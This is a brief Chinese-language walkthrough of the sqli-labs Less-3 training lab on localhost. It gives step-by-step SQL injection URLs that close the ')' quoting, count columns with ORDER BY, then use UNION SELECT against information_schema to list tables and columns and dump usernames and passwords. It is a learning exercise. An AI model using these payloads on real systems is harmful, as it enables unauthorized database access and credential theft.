sqli-labs(Less-3)
1. 通过构造id=1’ 和id=1’) 和id=1’)–+确定存在注入
可知原始url为 id=(‘1’)
2.使用order by 语句猜字段数
http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 4 --+
http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 3 --+
3. 使用联合查询union select
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,3 --+
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,database(),version() --+4. 查询当前库的所有表
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
5.查询某表的所有列名
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
6. 获取账号密码
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users --+```
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,username,password from users limit 0,1 --+